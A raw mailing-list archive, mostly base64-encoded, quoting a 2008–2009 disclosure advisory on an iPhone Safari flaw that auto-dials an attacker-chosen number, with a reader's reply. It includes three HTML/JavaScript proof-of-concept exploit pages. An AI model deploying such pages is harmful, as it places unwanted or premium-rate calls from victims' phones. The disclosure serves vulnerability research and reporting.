ZyBPUyB2ZXJzaW9uIDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24g
ZW1haWwgdG8gZGlhbCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQg
dGhlIHN1YmplY3QgbGluZSA7KQ0KPj4gDQo+PiBGV0lXLCBpdCBkaWRuJ3QgYWN0dWFsbHkgZGlh
bCwganVzdCBsb2FkZWQgdGhlIGRpYWxlciB3aXRoIHRoYXQgbnVtYmVyIHJlYWR5LiAgDQo+PiAN
Cj4+IExvb2tzIGxpa2UgdGhpcyBpcyBhIFdlYmtpdCBidWcsIG5vdCBTYWZhcmkuIA0KPj4gDQo+
PiBDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOg0KPj4gDQo+
Pj4gUmVsZWFzZWQgc2luY2UgQXBwbGUgcHVibGlzaGVkIHRoZSBpUGhvbmUgMy4wIHNlY3VyaXR5
IGZpeGVzLg0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBSZXBvcnQNCj4+Pg0KPj4+IC0tLSBCRUdJ
TiBBRFZJU09SWSAtLS0NCj4+Pg0KPj4+IE1hbnVmYWN0dXJlcjogQXBwbGUgKHd3dy5hcHBsZS5j
b20pDQo+Pj4gRGV2aWNlOiAgICAgICBpUGhvbmUgM0cgKGlQaG9uZSAxc3QgR2VuKQ0KPj4+IEZp
cm13YXJlOiAgICAgMi4xIChwb3NzaWJsZSBlYXJsaWVyIHZlcnNpb25zKQ0KPj4+IERldmljZSBU
eXBlOiAgc21hcnQgcGhvbmUNCj4+Pg0KPj4+IFN1YnN5c3RlbXM6IFNhZmFyaSAoYW5kIG1vYmls
ZSB0ZWxlcGhvbnkpDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+
DQo+Pj4gU2hvcnQgbmFtZToNCj4+PiAgIGlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsICh2
dWxuZXJhYmlsaXR5KQ0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBjbGFzczoNCj4+PiAgIGFwcGxp
Y2F0aW9uIGxvZ2ljIGJ1Zw0KPj4+DQo+Pj4gRXhlY3V0aXZlIFN1bW1hcnk6DQo+Pj4gICBBIG1h
bGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwgd2l0aG91dCB0aGUgbmVl
ZCBvZiB1c2VyDQo+Pj4gICBpbnRlcmFjdGlvbi4gVGhlIGRlc3RpbmF0aW9uIHBob25lIG51bWJl
ciBpcyBjaG9zZW4gYnkgdGhlIGF0dGFja2VyLg0KPj4+DQo+Pj4gUmlzazogTUVESVVNLUhJR0gN
Cj4+PiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBvZiBmaW5h
bmNpYWwgZ2FpbiB0aHJvdWdoDQo+Pj4gICB0aGlzIGF0dGFjayBieSBjYWxsaW5nIG9mIHByZW1p
dW0gcmF0ZSBudW1iZXJzIChlLmcuIDEtOTAwIGluIHRoZQ0KPj4+ICAgVS5TLikuIERlbmlhbC1v
Zi1zZXJ2aWNlIGFnYWluc3QgYXJiaXRyYXJ5IHBob25lIG51bWJlcnMgdGhyb3VnaA0KPj4+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4+Pg0KPj4+IC0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBSZXBvcnRlcjogQ29sbGluIE11bGxp
bmVyIDxjb2xsaW5bQVRdbXVsbGluZXIub3JnPg0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEFmZmlsaWF0aW9uOiBNVWxsaU5FUi5PUkcgLyB0aGUgdHJp
ZmluaXRlIGdyb3VwIC8gKEZyYXVuaG9mZXIgU0lUKQ0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IFRpbWUgbGluZToNCj4+Pg0KPj4+ICAgT2N0LiAyMC4g
MjAwODogUmVwb3J0ZWQgdnVsbmVyYWJpbGl0eSB0byB2ZW5kb3IuDQo+Pj4gICBPY3QuIDIwLiAy
MDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBvdXIgZW1haWwuDQo+Pj4gICAgICAg
ICAgICAgICAgICBOb3QgY29tbWVudGluZyBvbiB0aGUgdnVsbmVyYWJpbGl0eSBpdHNlbGYuDQo+
Pj4gICBPY3QuIDI3LiAyMDA4OiBTZW50IHVwZGF0ZSB0byB2ZW5kb3IsIGFsc28gcmVxdWVzdGlu
ZyBhIHN0YXR1cyByZXBvcnQuDQo+Pj4gICBPY3QuIDI5LiAyMDA4OiBSZXBseSBmcm9tIHZlbmRv
ciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPj4+ICAgT2N0LiAzMC4gMjAwODog
U2VudCBhZGRpdGlvbmFsIGluZm9ybWF0aW9uLg0KPj4+ICAgTm92LiAxMy4gMjAwODogVmVuZGVy
IHNheXMgdnVsbmVyYWJpbGl0eSBpcyBmaXhlZCBpbiB1cGNvbWluZyBPUw0KPj4+ICAgICAgICAg
ICAgICAgICAgdmVyc2lvbi4NCj4+PiAgIE5vdi4gMjAuIDIwMDg6IFB1YmxpYyBkaXNjbG9zdXJl
Lg0KPj4+ICAgSnVuLiAxOC4gMjAwOTogRnVsbC1EaXNjbG9zdXJlLg0KPj4+DQo+Pj4gLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEZpeDoNCj4+Pg0KPj4+ICAgaVBob25l
IE9TIDIuMg0KPj4+ICAgaVBob25lIE9TIDIuMi4xDQo+Pj4gICBpUGhvbmUgT1MgMy4wDQo+Pj4g
CQ0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBUZWNobmljYWwg
RGV0YWlsczoNCj4+Pg0KPj4+ICAgVGhlIFNhZmFyaSB2ZXJzaW9uIHJ1bm5pbmcgb24gdGhlIGlQ
aG9uZSBzdXBwb3J0cyBoYW5kbGluZyB0aGUgVEVMIFsxXQ0KPj4+ICAgcHJvdG9jb2wgdGhyb3Vn
aCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFsZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4+
PiAgIGRvbmUgYnkgcGFzc2luZyB0aGUgcHJvdmlkZWQgcGhvbmUgbnVtYmVyIHRvIHRoZSB0ZWxl
cGhvbnkNCj4+PiAgIGFwcGxpY2F0aW9uLiBVbmRlciBub3JtYWwgY29uZGl0aW9ucywgbG9hZGlu
ZyBhIHRlbDogVVJJIHJlc3VsdHMgaW4gYQ0KPj4+ICAgbWVzc2FnZSBib3ggYXNraW5nIHRoZSB1
c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBudW1iZXIuIFRoZQ0KPj4+ICAgdXNl
ciBpcyBwcmVzZW50ZWQgd2l0aCB0aGUgc2ltcGxlIGNob2ljZSB0byBlaXRoZXIgcHJlc3MgY2Fs
bCBvcg0KPj4+ICAgY2FuY2VsLg0KPj4+DQo+Pj4gICBBIFRFTCBVUkkgY2FuIGJlIG9wZW5lZCBh
dXRvbWF0aWNhbGx5IGlmIHRoZSBURUwgVVJJIGlzIHVzZWQgYXMgdGhlDQo+Pj4gICBzb3VyY2Ug
b2YgYW4gSFRNTCBpZnJhbWUgb3IgZnJhbWUsIGFzIHRoZSBVUkwgb2YgYSBtZXRhIHJlZnJlc2gs
IGFzDQo+Pj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwgYW5kIGFzIHRo
ZSBsb2NhdGlvbiBvZiB0aGUNCj4+PiAgIGN1cnJlbnQgb3IgYSBuZXcgd2luZG93IHVzaW5nIGph
dmFzY3JpcHQuDQo+Pj4NCj4+PiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJhYmls
aXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPj4+ICAgcGVybWlzc2lvbiB0byBjYWxs
IiBkaWFsb2cgaW4gYSB3YXkgdGhhdCBjaG9vc2VzIHRoZSAiY2FsbCIgb3B0aW9uDQo+Pj4gICBy
YXRoZXIgdGhhbiB0aGUgImNhbmNlbCIgb3B0aW9uLg0KPj4+IAkNCj4+PiAgIFRoaXMgY29uZGl0
aW9uIG9jY3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4+
PiAgIFNhZmFyaSBpcyBjbG9zZWQgYnkgbGF1bmNoaW5nIGFuIGV4dGVybmFsIGFwcGxpY2F0aW9u
LCBmb3IgZXhhbXBsZQ0KPj4+ICAgbGF1bmNoaW5nIHRoZSBTTVMgYXBwbGljYXRpb24gKGluIG9y
ZGVyIHRvIGhhbmRsZSBhIFNNUyBVUkkgWzJdKS4gVGhlDQo+Pj4gICBTTVMgYXBwbGljYXRpb24g
Y2FuIGJlIGxhdW5jaGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+Pj4gICBz
b3VyY2Ugb2YgYW4gaWZyYW1lLiBUaGlzIGlzIHNob3duIGluIHRoZSBmaXJzdCBwcm9vZi1vZi1j
b25jZXB0DQo+Pj4gICBleHBsb2l0IGJlbG93Lg0KPj4+IAkNCj4+PiAgIEZ1cnRoZXIgaW52ZXN0
aWdhdGlvbiBzaG93ZWQgdGhhdCB0aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+
Pj4gICBsYXVuY2hpbmcgb3RoZXIgYXBwbGljYXRpb25zIHN1Y2ggYXM6IE1hcHMsIFlvdVR1YmUs
IGFuZCBpVHVuZXMuDQo+Pj4gICBMYXVuY2hpbmcgdGhlc2UgYXBwbGljYXRpb25zIGNhbiBiZSBh
Y2hpZXZlZCB0aHJvdWdoIGxvYWRpbmcgc3BlY2lhbA0KPj4+ICAgVVJMcyB1c2luZyB0aGUgbWV0
YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93biBpbiB0aGUgc2Vjb25kDQo+Pj4gICBwcm9vZi1v
Zi1jb25jZXB0IGV4cGxvaXQgYmVsb3cuDQo+Pj4NCj4+PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0
aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVkIHRocm91Z2ggcG9wdXANCj4+PiAgIHdp
bmRvd3MgKGUuZy4gamF2YXNjcmlwdCBhbGVydCkuIEluIHRoaXMgc2l0dWF0aW9uIHRoZSBpbml0
aWF0aW5nIGFwcA0KPj4+ICAgZG9lcyBub3QgbmVlZCB0byBiZSB0ZXJtaWFudGVkIGluIG9yZGVy
IHRvIGFjdGl2ZSB0aGUgY2FsbC4NCj4+PiAJDQo+Pj4gICBGaW5hbGx5LCB3ZSBkaXNjb3ZlcmVk
IGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0NCj4+PiAgIG1hbGljaW91
cyBwaG9uZSBjYWxscyB0aGF0IGNhbm5vdCBiZSBwcmV2ZW50ZWQgb3IgY2FuY2VsZWQgYnkgdGhl
DQo+Pj4gICB2aWN0aW0uIFRoaXMgYnVnIGFsbG93cyB0aGUgYXR0YWNrZXIgdG8gZnJlZXogdGhl
IEdVSSAoZ3JhcGhpY2FsIHVzZXINCj4+PiAgIGludGVyZmFjZSkgZm9yIGEgbnVtYmVyIG9mIHNl
Y29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+Pj4gICBwcm9ncmVzc2Vz
IGluCXRoZSBiYWNrZ3JvdW5kIGFuZCBjYW5ub3QgYmUgc3RvcHBlZCBieSB0aGUgdmljdGltIHVz
ZXIuDQo+Pj4gICBGcmVlemluZyB0aGUgR1VJIGlzIGFjaGlldmVkIGJ5IHBhc3NpbmcgYSAidmVy
eSBsb25nIiBwaG9uZSBudW1iZXIgdG8NCj4+PiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRoZSBT
TVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+Pj4gICBzdGFydGVkLCBm
cmVlemVzIHRoZSBpUGhvbmUgR1VJLiBBbHNvIHN3aXRjaGluZyBvZmYgdGhlIGlQaG9uZSBjYW5u
b3QNCj4+PiAgIGJlIHBlcmZvcm1lZCBmYXN0IGVub3VnaCBpbiBvcmRlciB0byBwcmV2ZW50IHRo
ZSBtYWxpY2lvdXMgY2FsbC4NCj4+PiAJDQo+Pj4NCj4+PiAgIFsxXSBodHRwOi8vd3d3LnJmYy1l
ZGl0b3Iub3JnL3JmYy9yZmMzOTY2LnR4dA0KPj4+ICAgWzJdIGh0dHA6Ly90b29scy5pZXRmLm9y
Zy9odG1sL2RyYWZ0LWFudHRpLWdzbS1zbXMtdXJsLTA0DQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4gRnVydGhlciBEaXNjdXNzaW9uOg0KPj4+DQo+Pj4g
ICBUaGUgZGlhbGluZyBkaWFsb2cgaXMgY2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRo
ZSB1c2VyLCBpbiBtb3N0DQo+Pj4gICBjYXNlcywgY2FuJ3QgcHJlc3MgY2FuY2VsIHF1aWNrIGVu
b3VnaCBpbiBvcmRlciB0byBzdG9wIHRoZSBpbml0aWF0aW9uDQo+Pj4gICBvZiB0aGUgY2FsbC4g
T25jZSB0aGUgZXh0ZXJuYWwgYXBwbGljYXRpb24gaXMgbGF1bmNoZWQsIHRoZSB0ZWxlcGhvbnkN
Cj4+PiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcgaW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWlu
ZyB0aGUgY2FsbC4gT25seQ0KPj4+ICAgdGhlIGNhbGwgZm9yd2FyZGluZyBkaWFsb2cgKGNvbnRh
aW5pbmcgdGhlICJkaXNtaXNzIiBidXR0b24pIGluZGljYXRlcw0KPj4+ICAgYSBjYWxsIGJlaW5n
IG1hZGUuDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4g
UHJvb2Ytb2YtQ29uY2VwdCB3aXRoIHBsYWluIEhUTUwgdXNpbmcgdGhlIFNNUyBhcHBsaWNhdGlv
bjoNCj4+Pg0KPj4+ICAgPGh0bWw+DQo+Pj4gICA8aGVhZD4NCj4+PiAgIDx0aXRsZT5pUGhvbmUg
U2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29sbGluIE11bGxpbmVyDQo+
Pj4gICA8L3RpdGxlPg0KPj4+ICAgPC9oZWFkPg0KPj4+ICAgPGJvZHk+DQo+Pj4gICA8aWZyYW1l
IHNyYz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPj4+
ICAgPGlmcmFtZSBzcmM9InRlbDorMTQwODk3NDgzODgiIFdJRFRIPTUwIEhFSUdIVD0xMD48L2lm
cmFtZT4NCj4+PiAgIDwhLS0gc2Vjb25kIGlmcmFtZSBpcyB0byBhdHRhY2sgcXVpY2sgdXNlcnMg
d2hvIG1hbmFnZSB0byBjbG9zZSB0aGUNCj4+PiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8t
LT4NCj4+PiAgIDxpZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9
MTA+PC9pZnJhbWU+DQo+Pj4gICA8L2JvZHk+DQo+Pj4gICA8L2h0bWw+DQo+Pj4NCj4+PiBQcm9v
Zi1vZi1Db25jZXB0IHVzaW5nIGphdmFzY3JpcHQgYW5kIHRoZSBNYXBzIGFwcGxpY2F0aW9uOg0K
Pj4+DQo+Pj4gICA8aHRtbD4NCj4+PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZh
cmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAg
IDwvdGl0bGU+DQo+Pj4gICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOw0K
Pj4+ICAgVVJMPWh0dHA6Ly9tYXBzLmdvb2dsZS5kZS9tYXBzP3E9cmhlaW5zdHJhc3NlKzc1K2Rh
cm1zdGFkdCI+DQo+Pj4gICA8L2hlYWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFu
Zz1qYXZhc2NyaXB0Pg0KPj4+ICAgZnVuY3Rpb24gYSgpIHsNCj4+PiAgICBkb2N1bWVudC53cml0
ZSgiPGlmcmFtZSBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgV0lEVEg9NTAgDQo+Pj4gSEVJR0hU
PTEwPjwvaWZyYW1lPiIpOw0KPj4+ICAgfQ0KPj4+ICAgc2V0VGltZW91dCgiYSgpIiwgMTAwKTsN
Cj4+PiAgIDwvc2NyaXB0Pg0KPj4+ICAgPC9ib2R5Pg0KPj4+ICAgPC9odG1sPg0KPj4+IAkNCj4+
PiBQcm9vZi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0
b3AgdGhlIG1hbGljaW91cyANCj4+PiBwaG9uZSBjYWxsOg0KPj4+DQo+Pj4gICA8aHRtbD4NCj4+
PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4
cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAgIDwvdGl0bGU+DQo+Pj4gICA8L2hl
YWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFuZz1qYXZhc2NyaXB0Pg0KPj4+ICAg
bCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0KPj4+ICAgZm9yIChpID0gMDsgaSA8IDEwMDAwOyBp
KyspIHsNCj4+PiAgICAgICAgICAgbCA9IGwgKyAiMzM0MDk0ODAzNDI5ODIzMiI7DQo+Pj4gICB9
DQo+Pj4gICBsID0gbCArICJcIiB3aWR0aD0xMCBoZWlnaHQ9MTA+PC9pZnJhbWU+PGlmcmFtZQ0K
Pj4+ICAgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIGhlaWdodD0xMCB3aWR0aD0xMD48L2lmcmFt
ZT4iOw0KPj4+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+Pj4gICA8L3NjcmlwdD4NCj4+PiAgIDwv
Ym9keT4NCj4+PiAgIDwvaHRtbD4NCj4+Pg0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tDQo+Pj4NCj4+PiBNb3JlIERldGFpbGVkIEluZm9ybWF0aW9uOg0KPj4+DQo+Pj4gIERlbW8g
dmlkZW8gYXZhaWxhYmxlIGF0Og0KPj4+ICAgaHR0cDovL3d3dy5tdWxsaW5lci5vcmcvaXBob25l
Lw0KPj4+DQo+Pj4gIEFkdmlzb3JpZXM6DQo+Pj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9z
ZWN1cml0eS9hZHZpc29yaWVzLw0KPj4+DQo+Pj4gLS0tIEVORCBBRFZJU09SWSAtLS0NCj4+Pg0K
Pj4+DQo+Pj4gLS0gDQo+Pj4gQ29sbGluIFIuIE11bGxpbmVyIDxjb2xsaW5AYmV0YXZlcnNpb24u
bmV0Pg0KPj4+IGluZm8vcGdwOiBmaW5nZXIgY29sbGluQGJldGF2ZXJzaW9uLm5ldA0KPj4+IElm
IEJpbGwgR2F0ZXMgaGFkIGEgbmlja2VsIGZvciBldmVyeSB0aW1lIFdpbmRvd3MgY3Jhc2hlZC4u
LiBPaCB3YWl0LCBoZSANCj4+PiBkb2VzIQ0KPg0KPg0KPi0tIA0KPkNvbGxpbiBSLiBNdWxsaW5l
ciA8Y29sbGluQGJldGF2ZXJzaW9uLm5ldD4NCj5pbmZvL3BncDogZmluZ2VyIGNvbGxpbkBiZXRh
dmVyc2lvbi5uZXQNCj5DIGdpdmVzIHlvdSBlbm91Z2ggcm9wZSB0byBoYW5nIHlvdXJzZWxmLiBD
KysgYWxzbyBnaXZlcyB5b3UgdGhlIHRyZWUgDQo+b2JqZWN0IHRvIHRpZSBpdCB0by4NCg==

------OOQ6QVNMQ89GSPKM03TM81BMDDCI85--



From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 09:14
------OOQR8OIVASFMLRMIKQ9G04MAIHM98G
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

Q29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmluZyBPUyB2ZXJzaW9u
IDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24gZW1haWwgdG8gZGlh
bCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQgdGhlIHN1YmplY3Qg
bGluZSA7KQoKRldJVywgaXQgZGlkbid0IGFjdHVhbGx5IGRpYWwsIGp1c3QgbG9hZGVkIHRoZSBk
aWFsZXIgd2l0aCB0aGF0IG51bWJlciByZWFkeS4gIAoKTG9va3MgbGlrZSB0aGlzIGlzIGEgV2Vi
a2l0IGJ1Zywgbm90IFNhZmFyaS4gCgpDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lv
bi5uZXQ+IHdyb3RlOgoKPlJlbGVhc2VkIHNpbmNlIEFwcGxlIHB1Ymxpc2hlZCB0aGUgaVBob25l
IDMuMCBzZWN1cml0eSBmaXhlcy4NCj4NCj5WdWxuZXJhYmlsaXR5IFJlcG9ydA0KPg0KPi0tLSBC
RUdJTiBBRFZJU09SWSAtLS0NCj4NCj5NYW51ZmFjdHVyZXI6IEFwcGxlICh3d3cuYXBwbGUuY29t
KQ0KPkRldmljZTogICAgICAgaVBob25lIDNHIChpUGhvbmUgMXN0IEdlbikNCj5GaXJtd2FyZTog
ICAgIDIuMSAocG9zc2libGUgZWFybGllciB2ZXJzaW9ucykNCj5EZXZpY2UgVHlwZTogIHNtYXJ0
IHBob25lDQo+DQo+U3Vic3lzdGVtczogU2FmYXJpIChhbmQgbW9iaWxlIHRlbGVwaG9ueSkNCj4N
Cj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlNob3J0IG5hbWU6DQo+ICAgaVBo
b25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgKHZ1bG5lcmFiaWxpdHkpDQo+DQo+VnVsbmVyYWJp
bGl0eSBjbGFzczoNCj4gICBhcHBsaWNhdGlvbiBsb2dpYyBidWcNCj4NCj5FeGVjdXRpdmUgU3Vt
bWFyeToNCj4gICBBIG1hbGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwg
d2l0aG91dCB0aGUgbmVlZCBvZiB1c2VyDQo+ICAgaW50ZXJhY3Rpb24uIFRoZSBkZXN0aW5hdGlv
biBwaG9uZSBudW1iZXIgaXMgY2hvc2VuIGJ5IHRoZSBhdHRhY2tlci4NCj4NCj5SaXNrOiBNRURJ
VU0tSElHSA0KPiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBv
ZiBmaW5hbmNpYWwgZ2FpbiB0aHJvdWdoDQo+ICAgdGhpcyBhdHRhY2sgYnkgY2FsbGluZyBvZiBw
cmVtaXVtIHJhdGUgbnVtYmVycyAoZS5nLiAxLTkwMCBpbiB0aGUNCj4gICBVLlMuKS4gRGVuaWFs
LW9mLXNlcnZpY2UgYWdhaW5zdCBhcmJpdHJhcnkgcGhvbmUgbnVtYmVycyB0aHJvdWdoDQo+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4NCj4tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlJlcG9ydGVyOiBDb2xsaW4gTXVsbGluZXIgPGNvbGxp
bltBVF1tdWxsaW5lci5vcmc+DQo+DQo+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4N
Cj5BZmZpbGlhdGlvbjogTVVsbGlORVIuT1JHIC8gdGhlIHRyaWZpbml0ZSBncm91cCAvIChGcmF1
bmhvZmVyIFNJVCkNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlRpbWUg
bGluZToNCj4NCj4gICBPY3QuIDIwLiAyMDA4OiBSZXBvcnRlZCB2dWxuZXJhYmlsaXR5IHRvIHZl
bmRvci4NCj4gICBPY3QuIDIwLiAyMDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBv
dXIgZW1haWwuDQo+ICAgICAgICAgICAgICAgICAgTm90IGNvbW1lbnRpbmcgb24gdGhlIHZ1bG5l
cmFiaWxpdHkgaXRzZWxmLg0KPiAgIE9jdC4gMjcuIDIwMDg6IFNlbnQgdXBkYXRlIHRvIHZlbmRv
ciwgYWxzbyByZXF1ZXN0aW5nIGEgc3RhdHVzIHJlcG9ydC4NCj4gICBPY3QuIDI5LiAyMDA4OiBS
ZXBseSBmcm9tIHZlbmRvciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPiAgIE9j
dC4gMzAuIDIwMDg6IFNlbnQgYWRkaXRpb25hbCBpbmZvcm1hdGlvbi4NCj4gICBOb3YuIDEzLiAy
MDA4OiBWZW5kZXIgc2F5cyB2dWxuZXJhYmlsaXR5IGlzIGZpeGVkIGluIHVwY29taW5nIE9TDQo+
ICAgICAgICAgICAgICAgICAgdmVyc2lvbi4NCj4gICBOb3YuIDIwLiAyMDA4OiBQdWJsaWMgZGlz
Y2xvc3VyZS4NCj4gICBKdW4uIDE4LiAyMDA5OiBGdWxsLURpc2Nsb3N1cmUuDQo+DQo+LS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5GaXg6DQo+DQo+ICAgaVBob25lIE9TIDIuMg0K
PiAgIGlQaG9uZSBPUyAyLjIuMQ0KPiAgIGlQaG9uZSBPUyAzLjANCj4JDQo+LS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5UZWNobmljYWwgRGV0YWlsczoNCj4NCj4gICBUaGUgU2Fm
YXJpIHZlcnNpb24gcnVubmluZyBvbiB0aGUgaVBob25lIHN1cHBvcnRzIGhhbmRsaW5nIHRoZSBU
RUwgWzFdDQo+ICAgcHJvdG9jb2wgdGhyb3VnaCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFs
ZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4gICBkb25lIGJ5IHBhc3NpbmcgdGhlIHByb3ZpZGVk
IHBob25lIG51bWJlciB0byB0aGUgdGVsZXBob255DQo+ICAgYXBwbGljYXRpb24uIFVuZGVyIG5v
cm1hbCBjb25kaXRpb25zLCBsb2FkaW5nIGEgdGVsOiBVUkkgcmVzdWx0cyBpbiBhDQo+ICAgbWVz
c2FnZSBib3ggYXNraW5nIHRoZSB1c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBu
dW1iZXIuIFRoZQ0KPiAgIHVzZXIgaXMgcHJlc2VudGVkIHdpdGggdGhlIHNpbXBsZSBjaG9pY2Ug
dG8gZWl0aGVyIHByZXNzIGNhbGwgb3INCj4gICBjYW5jZWwuDQo+DQo+ICAgQSBURUwgVVJJIGNh
biBiZSBvcGVuZWQgYXV0b21hdGljYWxseSBpZiB0aGUgVEVMIFVSSSBpcyB1c2VkIGFzIHRoZQ0K
PiAgIHNvdXJjZSBvZiBhbiBIVE1MIGlmcmFtZSBvciBmcmFtZSwgYXMgdGhlIFVSTCBvZiBhIG1l
dGEgcmVmcmVzaCwgYXMNCj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwg
YW5kIGFzIHRoZSBsb2NhdGlvbiBvZiB0aGUNCj4gICBjdXJyZW50IG9yIGEgbmV3IHdpbmRvdyB1
c2luZyBqYXZhc2NyaXB0Lg0KPg0KPiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJh
YmlsaXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPiAgIHBlcm1pc3Npb24gdG8gY2Fs
bCIgZGlhbG9nIGluIGEgd2F5IHRoYXQgY2hvb3NlcyB0aGUgImNhbGwiIG9wdGlvbg0KPiAgIHJh
